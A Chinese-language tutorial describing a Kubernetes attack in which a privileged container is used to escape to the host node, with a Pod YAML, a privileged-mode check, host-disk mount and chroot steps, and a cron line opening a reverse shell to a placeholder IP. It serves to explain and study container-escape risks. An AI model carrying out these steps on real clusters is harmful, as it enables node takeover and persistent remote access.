K8s攻击案例：Privileged特权容器导致节点沦陷

01、概述

特权容器（Privileged Container）是一种比较特殊的容器，在K8s中运行特权容器，需要将 Privileged 设为 true ，容器可以执行几乎所有可以直接在主机上执行的操作。

基于此，利用容器的特权配置可以获取容器所在节点的权限，甚至从节点权限提升至集群管理员权限。

02、攻击场景

编写yaml文件，在securityContext中加入参数，将privileged设置为true，使用特权模式运行Pod。

yaml文件内容：

apiVersion: v1
kind: Pod
metadata:
  name: pod1
spec:
  containers:
  - image: nginx
    name: pod1
    command: ['/bin/sh','-c','sleep 24h'] 
    securityContext:
      privileged: true

02、攻击过程

(1) 判断是否特权模式

在容器中可以使用命令检测当前容器是否以特权容器启动，CapEff对应的掩码值在centos中为 0000001fffffffff ，在ubuntu中为0000003fffffffff。

基于以上，可以简单的通过一行命令，如果返回的是Yes说明当前是特权模式，如果返回No则不是。

cat /proc/self/status |grep -qi "0000001fffffffff" && echo "Yes" || echo "No"

（2）查看当前磁盘分区情况，获取宿主机分区

（3）将宿主机目录挂载到容器里，chroot进入宿主机系统，获取宿主机的权限。

（4）此时，也可以使用计划任务反弹shell。

echo '* * * * * bash -i >& /dev/tcp/xx.xx.xx.xx/12345 0>&1' >> /var/spool/cron/root

（5）在Node节点上查找kubelet配置文件，一般情况下，开启了NodeRestriction准入插件，kubelet证书可用来查看pod信息，但是不能创建Pod。下载kubecrl命令行工具， 收集信息为进一步攻击K8s集群提供必要的条件。